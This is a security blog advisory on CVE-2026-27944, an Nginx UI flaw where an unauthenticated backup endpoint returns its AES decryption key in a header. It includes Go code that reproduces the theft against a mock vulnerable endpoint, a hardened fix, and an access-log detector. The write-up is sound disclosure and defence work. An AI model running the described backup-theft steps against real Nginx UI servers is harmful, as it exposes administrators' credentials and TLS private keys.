Nginx UI Vulnerability: CVE-2026-27944 Exposes Server Backups

  • Mar 8
  • 2 min read

Key Findings


  • A critical vulnerability in Nginx UI, tracked as CVE-2026-27944, lets an unauthenticated attacker download and decrypt full server backups.

  • Two flaws combine: the /api/backup endpoint performs no authentication check, and the server sends the AES-256 key and IV needed to decrypt the backup in an HTTP response header of the same response that carries the ciphertext.

  • The impact is severe because a full Nginx UI backup contains admin credentials, session tokens, private SSL/TLS keys, database credentials and Nginx configurations, enough to impersonate administrators and the sites they manage.


Background


Nginx UI is a web-based management dashboard designed to simplify the administration of Nginx servers. Instead of configuring Nginx through command-line files, administrators can use a graphical interface to manage servers, monitor performance, and update configurations.


Technical Details


Vulnerability Analysis


The vulnerability is a Missing Authentication for Critical Function (CWE-306) in Nginx UI's backup feature. The /api/backup endpoint does not check for a valid session, so anyone who can reach the management interface over the network can request a backup without credentials.


Compounding this, the response carries the AES-256 key and IV required to decrypt that backup in the X-Backup-Security header. Encryption only protects data when the key is held by someone other than whoever can obtain the ciphertext; transmitting the key alongside the encrypted body therefore provides no protection at all.


Root Cause


The root cause is the absence of authentication middleware on the /api/backup endpoint. Backup creation and download are critical administrative functions and must sit behind the same authentication (and authorization) checks as the rest of the admin API. Independently of that, returning the decryption key in a response header is a cryptographic design error: a key that travels with the ciphertext negates any benefit of encrypting the backup, regardless of the cipher or key size used.


Attack Vector


The attack is network-based and requires neither credentials nor user interaction. An attacker with network access to the Nginx UI management interface can:


1. Send a single request to the /api/backup endpoint without any session or token


2. Read the AES key and IV from the X-Backup-Security response header


3. Decrypt the response body immediately, yielding the full system backup
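To make the root cause and the attack vector concrete, here is an added example in Go (Nginx UI's own language) that is not Nginx UI's code and not taken from the advisory. It builds a constructed stand-in for the flawed endpoint, the same endpoint with the missing authentication middleware and the key kept out of the response, and the three-step attack run against both. The `key=…;iv=…` header layout, the bearer-token session scheme, AES-CTR as the mode and the backup contents are all assumptions made for the demonstration.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed stand-in for the archive; a real backup holds admin credentials,
// session tokens, TLS private keys and the Nginx configuration.
const backupPayload = "admin=root:hunter2\nssl_key=-----BEGIN PRIVATE KEY-----..."

// aesCTR encrypts or decrypts (CTR is symmetric) with AES-256 (32-byte key).
func aesCTR(key, iv, in []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	out := make([]byte, len(in))
	cipher.NewCTR(block, iv).XORKeyStream(out, in)
	return out, nil
}

func randomBytes(n int) []byte {
	b := make([]byte, n)
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
	return b
}

// NewVulnerableMux mirrors the flawed design: no auth check, and the key and
// IV ride in X-Backup-Security next to the ciphertext (header format assumed).
func NewVulnerableMux() http.Handler {
	mux := http.NewServeMux()
	mux.HandleFunc("/api/backup", func(w http.ResponseWriter, r *http.Request) {
		key, iv := randomBytes(32), randomBytes(aes.BlockSize)
		ct, err := aesCTR(key, iv, []byte(backupPayload))
		if err != nil {
			http.Error(w, err.Error(), http.StatusInternalServerError)
			return
		}
		w.Header().Set("X-Backup-Security",
			"key="+hex.EncodeToString(key)+";iv="+hex.EncodeToString(iv))
		w.Write(ct)
	})
	return mux
}

// requireAuth is the middleware CWE-306 says is missing: a valid bearer token
// (hypothetical scheme) is required, compared in constant time.
func requireAuth(token string, next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		got := strings.TrimPrefix(r.Header.Get("Authorization"), "Bearer ")
		if subtle.ConstantTimeCompare([]byte(got), []byte(token)) != 1 {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// NewHardenedMux gates /api/backup behind requireAuth and encrypts with a key
// the administrator already holds out of band. Only the non-secret IV is sent,
// as a prefix of the body; nothing in the response lets a bystander decrypt it.
func NewHardenedMux(token string, key []byte) http.Handler {
	mux := http.NewServeMux()
	backup := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		iv := randomBytes(aes.BlockSize)
		ct, err := aesCTR(key, iv, []byte(backupPayload))
		if err != nil {
			http.Error(w, err.Error(), http.StatusInternalServerError)
			return
		}
		w.Write(append(iv, ct...))
	})
	mux.Handle("/api/backup", requireAuth(token, backup))
	return mux
}

// stealBackup runs the advisory's three steps: one unauthenticated GET, key and
// IV parsed from the header, body decrypted on the spot.
func stealBackup(h http.Handler) (string, bool) {
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, "/api/backup", nil))
	hdr := rec.Header().Get("X-Backup-Security")
	if rec.Code != http.StatusOK || hdr == "" {
		return "", false
	}
	var key, iv []byte
	for _, kv := range strings.Split(hdr, ";") {
		name, val, _ := strings.Cut(kv, "=")
		b, err := hex.DecodeString(val)
		if err != nil {
			return "", false
		}
		if name == "key" {
			key = b
		} else if name == "iv" {
			iv = b
		}
	}
	if len(key) != 32 || len(iv) != aes.BlockSize {
		return "", false
	}
	pt, err := aesCTR(key, iv, rec.Body.Bytes())
	return string(pt), err == nil
}

// downloadBackup is the legitimate path against the hardened endpoint.
func downloadBackup(h http.Handler, token string, key []byte) (string, error) {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodGet, "/api/backup", nil)
	req.Header.Set("Authorization", "Bearer "+token)
	h.ServeHTTP(rec, req)
	if rec.Code != http.StatusOK {
		return "", fmt.Errorf("status %d", rec.Code)
	}
	body := rec.Body.Bytes()
	if len(body) < aes.BlockSize {
		return "", errors.New("short body")
	}
	pt, err := aesCTR(key, body[:aes.BlockSize], body[aes.BlockSize:])
	return string(pt), err
}

func main() {
	pt, ok := stealBackup(NewVulnerableMux())
	fmt.Printf("vulnerable endpoint: stolen=%v %q\n", ok, pt)
	key := randomBytes(32)
	_, ok = stealBackup(NewHardenedMux("s3ss10n", key))
	fmt.Printf("hardened endpoint: stolen=%v\n", ok)
	pt, err := downloadBackup(NewHardenedMux("s3ss10n", key), "s3ss10n", key)
	fmt.Printf("hardened endpoint, authorized admin: %q err=%v\n", pt, err)
}
```

The hardened variant fixes both flaws independently: even if the auth middleware were bypassed, the response would still contain only ciphertext and an IV, which is useless without the out-of-band key. Fixing only the authentication, while keeping the key in the header, would leave every authenticated user (and any proxy or log that records response headers) able to decrypt any backup.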


Detection and Mitigation


Indicators of Compromise


  • Access-log entries for /api/backup, in particular successful (HTTP 200) responses to source addresses that are not known administrator hosts. Ordinary access logs do not record whether a session was presented, so every unexpected hit on this path should be treated as suspicious and confirmed against whatever session logging the deployment keeps.

  • An X-Backup-Security header in an unauthenticated response from /api/backup. This identifies a vulnerable version rather than a compromise, but an instance that returns it and has been reachable from untrusted networks should be assumed to have had its backup, and therefore its credentials and keys, taken.
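The first indicator above can be checked mechanically against access logs. The following is an added example in Go, not part of the original post or of Nginx UI, that scans lines in the nginx "combined" log format, keeps only successful requests to /api/backup and drops those from an administrator allowlist. The log lines are constructed for the example (addresses are documentation ranges) and the combined format is an assumption about how the deployment logs requests.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// BackupHit is one access-log entry that successfully fetched the backup endpoint.
type BackupHit struct {
	IP, Time, Method, Path, UserAgent string
	Status, Bytes                     int
}

// combined matches the nginx "combined" log format:
// ip - user [time] "METHOD path proto" status bytes "referer" "user-agent"
var combined = regexp.MustCompile(
	`^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+|-) "[^"]*" "([^"]*)"`)

// FlagBackupRequests returns every HTTP 200 request for /api/backup whose
// source address is not in adminIPs. Query strings are ignored when matching
// the path so "/api/backup?x=1" is still caught.
func FlagBackupRequests(lines []string, adminIPs map[string]bool) []BackupHit {
	var hits []BackupHit
	for _, line := range lines {
		m := combined.FindStringSubmatch(line)
		if m == nil {
			continue // not a combined-format line; skip rather than guess
		}
		path := m[4]
		if i := strings.IndexByte(path, '?'); i >= 0 {
			path = path[:i]
		}
		if path != "/api/backup" {
			continue
		}
		status, _ := strconv.Atoi(m[5])
		size, _ := strconv.Atoi(m[6]) // "-" parses to 0
		if status != 200 || adminIPs[m[1]] {
			continue
		}
		hits = append(hits, BackupHit{
			IP: m[1], Time: m[2], Method: m[3], Path: path,
			UserAgent: m[7], Status: status, Bytes: size,
		})
	}
	return hits
}

// sampleLog is constructed for this example, not taken from any real deployment.
var sampleLog = []string{
	`10.0.0.5 - - [08/Mar/2026:09:58:11 +0000] "GET /api/backup HTTP/1.1" 200 48213 "https://nginx-ui.internal/" "Mozilla/5.0"`,
	`203.0.113.7 - - [08/Mar/2026:10:15:02 +0000] "GET /api/backup HTTP/1.1" 200 48213 "-" "python-requests/2.31.0"`,
	`203.0.113.7 - - [08/Mar/2026:10:15:03 +0000] "GET /api/configs HTTP/1.1" 401 27 "-" "python-requests/2.31.0"`,
	`198.51.100.9 - - [08/Mar/2026:10:16:40 +0000] "GET /api/backup?x=1 HTTP/1.1" 403 0 "-" "curl/8.5.0"`,
}

func main() {
	admins := map[string]bool{"10.0.0.5": true}
	for _, h := range FlagBackupRequests(sampleLog, admins) {
		fmt.Printf("%s %s %s %s -> %d (%d bytes) ua=%q\n",
			h.Time, h.IP, h.Method, h.Path, h.Status, h.Bytes, h.UserAgent)
	}
}
```

On the sample input only the 203.0.113.7 download is reported: the administrator's own download is allowlisted and the 403 from 198.51.100.9 never received a body. The response size is worth keeping in the report, since a 200 with a body of realistic backup size is the strongest sign that the archive actually left the host.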


Mitigation


  • Upgrade to Nginx UI version 2.3.3 or later, which addresses the vulnerability

  • As a temporary workaround, block access to the /api/backup endpoint using firewall rules or a reverse proxy in front of Nginx UI, and restrict the management interface to trusted networks; this does not change the key-in-header behaviour, so it is no substitute for the upgrade

  • If an instance was reachable from untrusted networks while vulnerable, assume the backup was taken and rotate everything it contains: admin passwords, session tokens, TLS private keys and database credentials


Conclusion


CVE-2026-27944 highlights the importance of securing management interfaces and applying the principle of least privilege. Organizations should restrict access to Nginx UI and similar tools to authorized users and networks, and regularly review APIs and admin endpoints for routes that are missing authentication or that leak secrets in responses.


Sources


  • https://securityaffairs.com/189123/security/critical-nginx-ui-flaw-cve-2026-27944-exposes-server-backups.html

  • https://www.sentinelone.com/vulnerability-database/cve-2026-27944/

© 2025 by Explain IT Again